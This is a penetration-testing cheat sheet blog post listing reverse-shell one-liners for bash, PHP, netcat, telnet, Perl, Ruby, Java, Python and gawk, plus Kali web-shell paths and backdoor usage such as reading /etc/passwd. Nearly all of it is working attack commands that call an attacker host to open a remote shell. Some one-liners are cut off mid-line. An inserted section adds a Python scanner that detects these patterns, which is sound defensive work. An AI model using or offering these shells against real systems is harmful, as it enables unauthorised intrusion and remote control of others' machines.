Reverse Shell Cheat Sheet
CHEAT-SHEET 29 Mar 2015 Arr0way

During penetration testing, if you're lucky enough to find a remote command execution vulnerability, you'll more often than not want to connect back to your attacking machine to leverage an interactive shell.

Below is a collection of reverse shells that use commonly installed programming languages, or commonly installed binaries (nc, telnet, bash, etc). At the bottom of the post is a collection of uploadable reverse shells, present in Kali Linux.

If you found this resource useful you should also check out our penetration testing tools cheat sheet, which has some additional reverse shells and other commands useful when performing penetration testing.

Table of Contents
Setup Listening Netcat
Bash Reverse Shells
PHP Reverse Shell
Netcat Reverse Shell
Telnet Reverse Shell
Perl Reverse Shell
Perl Windows Reverse Shell
Ruby Reverse Shell
Java Reverse Shell
Python Reverse Shell
Gawk Reverse Shell
Kali Web Shells
Kali PHP Web Shells
Kali Perl Reverse Shell
Kali Cold Fusion Shell
Kali ASP Shell
Kali ASPX Shells
Kali JSP Reverse Shell

Setup Listening Netcat
Your remote shell will need a listening netcat instance in order to connect back.

★ Set your Netcat listening shell on an allowed port
Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443

To set up a listening netcat instance, enter the following:
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
ⓘ NAT requires a port forward
If your attacking machine is behind a NAT router, you'll need to set up a port forward to the attacking machine's IP / Port.

ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).
Bash Reverse Shells
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
PHP Reverse Shell
A useful PHP reverse shell:
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or
Netcat Reverse Shell
Useful netcat reverse shell examples:
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Remember to listen on 443 on the attacking machine also.
Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_ST
Perl Windows Reverse Shell
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");ST
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_ST
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprin
Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <
p.waitFor()
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INE
Gawk Reverse Shell
#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
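A defender's counterpart to the one-liners above, added here as an example and not part of the original post: a small Python scanner that flags process command lines matching these patterns and raises the severity when the parent process is a web or application server. The log line format, the rule names and the WEB_PARENTS list are assumptions; the sample events are constructed.

```python
import re

# Added example: patterns mirror the one-liners on this page; rule names are ours.
RULES = {
    "dev_tcp_redirect": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    "netcat_exec": re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-\w*e\s+\S*sh\b"),
    "fifo_relay": re.compile(r"\bmknod\s+\S+\s+p\b.*\b(?:nc|telnet)\b"),
    "shell_net_pipe": re.compile(
        r"\b(?:nc|telnet)\b[^|]*\|\s*/bin/(?:ba)?sh\b|/bin/(?:ba)?sh\s*\|\s*(?:nc|telnet)\b"),
    "interp_socket": re.compile(
        r"\b(?:python[\d.]*|perl|ruby|php)\s+-\S+.*(?:socket|fsockopen)", re.I),
    "gawk_inet": re.compile(r"\bg?awk\b.*/inet/tcp/"),
}
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "java"}  # assumed service names
LINE = re.compile(r"host=(\S+) pid=(\d+) parent=(\S+) cmd=(.*)")  # assumed log format

def classify(cmd):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]

def scan(lines):
    """Return (host, pid, severity, rules) for each suspicious process event."""
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed records instead of crashing
        host, pid, parent, cmd = m.groups()
        hits = classify(cmd)
        if hits:
            sev = "high" if parent in WEB_PARENTS else "medium"
            alerts.append((host, int(pid), sev, hits))
    return alerts

# Constructed sample events (192.0.2.10 is a documentation address).
SAMPLE = [
    "host=web01 pid=4101 parent=apache2 cmd=bash -c bash -i >& /dev/tcp/192.0.2.10/80 0>&1",
    "host=web01 pid=4102 parent=sshd cmd=nc -zv 10.0.0.5 22",
    "host=app02 pid=977 parent=java cmd=/bin/bash -c exec 5<>/dev/tcp/192.0.2.10/80",
    "host=db03 pid=512 parent=bash cmd=nc -e /bin/sh 192.0.2.10 80",
    "host=db03 pid=513 parent=cron cmd=python3 -m http.server 8000",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

A web server or JVM spawning a shell with a socket redirect is rarely legitimate, which is why the parent process drives the severity here.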
Kali Web Shells
The following shells exist within Kali Linux, under /usr/share/webshells/. These are only useful if you are able to upload, inject or transfer the shell to the machine.
Kali PHP Web Shells
Kali PHP reverse shells and command shells:
| COMMAND | DESCRIPTION |
|---|---|
| /usr/share/webshells/php/php-reverse-shell.php | Pen Test Monkey - PHP Reverse Shell |
| /usr/share/webshells/php/php-findsock-shell.php, /usr/share/webshells/php/findsock.c | Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindful of the target server's architecture), execute with netcat not a browser nc -v target 80 |
| /usr/share/webshells/php/simple-backdoor.php | PHP backdoor, useful for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd |
| /usr/share/webshells/php/php-backdoor.php | Larger PHP shell, with a text input box for command execution. |
★ Tip: Executing Reverse Shells
The last two shells above are not reverse shells, however they can be useful for executing a
reverse shell.
Kali Perl Reverse Shell
Kali perl reverse shell:
| COMMAND | DESCRIPTION |
|---|---|
| /usr/share/webshells/perl/perl-reverse-shell.pl | Pen Test Monkey - Perl Reverse Shell |
| /usr/share/webshells/perl/perlcmd.cgi | Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd |
Kali Cold Fusion Shell
Kali Coldfusion Shell:
| COMMAND | DESCRIPTION |
|---|---|
| /usr/share/webshells/cfm/cfexec.cfm | Cold Fusion Shell - aka CFM Shell |
Kali ASP Shell
Classic ASP Reverse Shell + CMD shells:
| COMMAND | DESCRIPTION |
|---|---|
| /usr/share/webshells/asp/ | Kali ASP Shells |
Kali ASPX Shells
ASP.NET reverse shells within Kali:
| COMMAND | DESCRIPTION |
|---|---|
| /usr/share/webshells/aspx/ | Kali ASPX Shells |
Kali JSP Reverse Shell
Kali JSP Reverse Shell:
| COMMAND | DESCRIPTION |
|---|---|
| /usr/share/webshells/jsp/jsp-reverse.jsp | Kali JSP Reverse Shell |
The contents of this website are © 2018
Proudly hosted by
HighOn.Coffee